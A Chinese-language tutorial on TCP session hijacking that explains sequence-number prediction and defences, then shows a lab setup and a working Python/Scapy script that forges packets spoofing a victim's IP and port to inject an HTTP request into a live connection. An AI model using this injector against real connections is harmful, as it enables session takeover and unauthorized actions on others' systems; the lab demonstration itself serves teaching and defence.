一、介绍

TCP劫持攻击（TCP Hijacking），也称为会话劫持，是一种攻击方式，攻击者在合法用户与服务器之间的通信过程中插入或劫持数据包，从而控制通信会话。通过TCP劫持，攻击者可以获取敏感信息、执行未授权的操作或中断正常通信。

1.1 TCP劫持攻击的原理

TCP劫持攻击主要利用了TCP协议的以下特性：

1. 序列号预测：TCP连接中的数据包是按序列号顺序传输的，攻击者可以通过监听网络流量预测下一个有效的序列号。
2. 中间人攻击（MITM）：攻击者可以通过中间人攻击拦截和篡改通信数据包，从而控制通信会话。

1.2 TCP劫持攻击的类型

1. 主动劫持：攻击者通过发送伪造的数据包中断或接管现有的TCP连接。
2. 被动劫持：攻击者通过监听网络流量，获取会话中的敏感信息。

1.3 防御措施

1. 加密通信：使用TLS/SSL等加密协议保护通信数据，防止攻击者监听和篡改数据包。
2. 使用安全的序列号生成算法：在TCP连接建立时使用强序列号生成算法，增加序列号的不可预测性。
3. 入侵检测系统（IDS）：部署IDS实时监控网络流量，检测并阻止异常的TCP数据包。
4. 网络隔离和分段：通过网络隔离和分段，限制攻击者获取敏感的网络流量。
5. 双因素认证：在关键业务场景中使用双因素认证，增强通信的安全性。

通过这些防御措施，可以有效减缓或防止TCP劫持攻击，确保网络通信的安全性和稳定性。

二、实验环境

用户 Kali 在与服务器通信：192.168.134.147

服务器：192.168.134.148

三、实操演示

先获取到序列号及目标端口

以下是一个使用Python和Scapy库实现TCP劫持攻击的示例代码：

from scapy.all import *
from scapy.layers.inet import TCP


def tcp_hijack_attack(victim_ip, victim_port, server_ip, server_port, seq, ack, data):
    # 构造IP和TCP头部
    ip = IP(src=victim_ip, dst=server_ip)
    tcp = TCP(sport=victim_port, dport=server_port, seq=seq, ack=ack, flags="PA")  # PA表示带有数据的包
    payload = data

    # 发送伪造数据包
    send(ip / tcp / payload, verbose=1)
    print(
        f"Sent TCP hijack packet from {victim_ip}:{victim_port} to {server_ip}:{server_port} with seq={seq} and ack={ack}")


if __name__ == "__main__":
    victim_ip = "192.168.134.147"  # 受害者客户端的IP地址
    victim_port = 49658  # 受害者客户端的端口
    server_ip = "192.168.134.148"  # 服务器的IP地址
    server_port = 8080  # 服务器的端口
    seq = 182  # 预测的序列号
    ack = 426  # 确认号
    data = "GET / HTTP/1.1\r\nHost: www.hubstc.com.cn\r\n\r\n"  # 伪造的数据

    tcp_hijack_attack(victim_ip, victim_port, server_ip, server_port, seq, ack, data)